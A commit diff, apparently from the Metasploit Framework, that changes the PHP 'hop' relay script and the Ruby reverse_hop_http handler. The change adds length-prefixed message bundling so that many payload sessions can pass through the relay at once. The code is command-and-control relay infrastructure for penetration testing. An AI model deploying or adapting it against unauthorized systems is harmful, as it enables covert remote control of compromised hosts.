Added bundling to handle many sessions at once.

2014-02-13 13:42:07 -06:00 · 2014-02-13 13:42:07 -06:00 · 022c52d087
parent c0983138a0
commit 022c52d087
2 changed files with 42 additions and 36 deletions
--- a/data/php/hop.php
+++ b/data/php/hop.php
@ -10,7 +10,7 @@ $url = $_SERVER["QUERY_STRING"];
 //like /path/hop.php?/uRIcksm_lOnGidENTifIEr

 //Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix){
+function findSendDelete($tempdir, $prefix, $one=true){
 	if($dh = opendir($tempdir)){
 		while(($file = readdir($dh)) !== false){
 			if(strpos($file, $prefix) !== 0){
@ -18,7 +18,9 @@ function findSendDelete($tempdir, $prefix){
 			}
 			readfile($tempdir."/".$file);
 			unlink($tempdir."/".$file);
-			break;
+			if($one){
+				break;
+			}
 		}
 	}
 }
@ -37,7 +39,7 @@ if($url === "/control"){
 		fwrite($f, $postdata);
 		fclose($f);
 	}else{
-		findSendDelete($tempdir, "up_");
+		findSendDelete($tempdir, "up_", false);
 	}
 }else if($_SERVER['REQUEST_METHOD'] === 'POST'){
 	//get data
@ -56,6 +58,8 @@ if($url === "/control"){
 	$urlen = strlen($url);
 	fwrite($f, pack('V', $urlen));
 	fwrite($f, $url);
+	$postdatalen = strlen($postdata);
+	fwrite($f, pack('V', $postdatalen));
 	fwrite($f, $postdata);
 	fclose($f);
 //Initial query will be a GET and have a 12345 in it
--- a/lib/msf/core/handler/reverse_hop_http.rb
+++ b/lib/msf/core/handler/reverse_hop_http.rb
@ -104,42 +104,44 @@ module ReverseHopHttp
          next
        end

-        # validate response
+        # validate responses, handle each message down
        received = res.body
-        next if received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC
+        until received.length < 12 || received.slice!(0, MAGIC.length) != MAGIC

-        # good response
-        delay = 0 # we're talking, speed up
-        urlen = received.slice!(0,4).unpack('V')[0]
-        urlpath = received.slice!(0,urlen)
+          # good response
+          delay = 0 # we're talking, speed up
+          urlen = received.slice!(0,4).unpack('V')[0]
+          urlpath = received.slice!(0,urlen)
+          datalen = received.slice!(0,4).unpack('V')[0]

-        # do not want handlers to change while we dispatch this
-        hop_http.lock.lock
-        #received is now the binary contents of the message
-        if hop_http.handlers.include? urlpath
-          pack = Rex::Proto::Http::Packet.new
-          pack.body = received
-          hop_http.current_url = urlpath
-          hop_http.handlers[urlpath].call(hop_http, pack)
-          hop_http.lock.unlock
-        elsif !closed_handlers.include? urlpath
-          hop_http.lock.unlock
-          #New session!
-          conn_id = urlpath.gsub("/","")
-          # Short-circuit the payload's handle_connection processing for create_session
-          # We are the dispatcher since we need to handle the comms to the hop
-          create_session(hop_http, {
-            :passive_dispatcher => self,
-            :conn_id            => conn_id,
-            :url                => uri.to_s + conn_id + "/\x00",
-            :expiration         => datastore['SessionExpirationTimeout'].to_i,
-            :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
-            :ssl                => false,
-          })
-          # send new stage to hop so next inbound session will get a unique ID.
-          hop_http.send_new_stage
-        else
-          hop_http.lock.unlock
+          # do not want handlers to change while we dispatch this
+          hop_http.lock.lock
+          #received now starts with the binary contents of the message
+          if hop_http.handlers.include? urlpath
+            pack = Rex::Proto::Http::Packet.new
+            pack.body = received.slice!(0,datalen)
+            hop_http.current_url = urlpath
+            hop_http.handlers[urlpath].call(hop_http, pack)
+            hop_http.lock.unlock
+          elsif !closed_handlers.include? urlpath
+            hop_http.lock.unlock
+            #New session!
+            conn_id = urlpath.gsub("/","")
+            # Short-circuit the payload's handle_connection processing for create_session
+            # We are the dispatcher since we need to handle the comms to the hop
+            create_session(hop_http, {
+              :passive_dispatcher => self,
+              :conn_id            => conn_id,
+              :url                => uri.to_s + conn_id + "/\x00",
+              :expiration         => datastore['SessionExpirationTimeout'].to_i,
+              :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+              :ssl                => false,
+            })
+            # send new stage to hop so next inbound session will get a unique ID.
+            hop_http.send_new_stage
+          else
+            hop_http.lock.unlock
+          end
        end
      end
      hop_http.monitor_thread = nil #make sure we're out